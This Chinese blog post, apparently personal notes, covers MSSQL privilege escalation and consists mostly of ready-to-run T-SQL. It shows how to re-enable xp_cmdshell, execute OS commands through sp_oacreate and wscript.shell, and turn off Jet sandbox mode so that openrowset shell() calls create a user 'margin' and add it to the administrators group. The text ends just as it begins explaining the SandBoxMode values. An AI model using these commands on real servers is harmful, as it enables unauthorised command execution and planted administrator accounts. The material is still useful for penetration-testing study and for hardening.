权限提升-mssql-oracle提权随笔-优快云博客

本文链接：https://blog.youkuaiyun.com/qq_53577336/article/details/120147129

本文介绍了SQL数据库中的提权方法，包括MSSQL的xp_cmdshell、sp_oacreate和沙盒提权，详细讲解了启用、关闭这些功能的步骤以及如何利用它们执行系统命令。同时提到了Oracle数据库的oracleshell提权工具及其使用条件。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x00 mssql提权方式简介

1）xp_cmd_shell提权
2）sp_oacreate提权
3）沙盒提权

xp_cmd_shell提权
mssql2000中默认开启xpcmdshell 2005以后默认禁用
管理员 sa 权限则可以用 sp_configure 重修开启它

启用：
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 1;
RECONFIGURE;

关闭：
exec sp_configure ‘show advanced options’, 1;
reconfigure;
exec sp_configure ‘xp_cmdshell’, 0;
reconfigure;

执行：
EXEC master.dbo.xp_cmdshell ‘命令’

如果 xp_cmdshell 被删除了，可以上传 xplog70.dll 进行恢复
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll’

sp_oacreate提权
主要是用来调用 OLE 对象，利用 OLE 对象的 run 方法执行系统命令。

启用：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;

关闭：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 0;
RECONFIGURE WITH OVERRIDE;

执行：
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,‘run’,null,‘c:\windows\system32\cmd.exe /c whoami >c:\1.txt’

沙盒提权
mssql自带沙盒，利用沙盒执行命令
开启沙盒，使用沙盒执行命令，

exec sp_configure ‘show advanced options’,1;reconfigure;
– 不开启的话在执行 xp_regwrite 会提示让我们开启，

exec sp_configure ‘Ad Hoc Distributed Queries’,1;reconfigure;
–关闭沙盒模式，如果一次执行全部代码有问题，先执行上面两句代码。

exec master…xp_regwrite
‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Jet\4.0\Engines’,‘SandBoxMode’,‘REG_DWORD’,0;
–查询是否正常关闭，经过测试发现沙盒模式无论是开，还是关，都不会影响我们执行下面的语句。
exec master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Jet\4.0\Engines’,
‘SandBoxMode’
– 执行系统命令 select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,‘select shell(“net user
margin margin /add”)’)
select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,‘select shell(“net
localgroup administrators margin /add”)’)
沙盒模式 SandBoxMode 参数含义（默认是 2）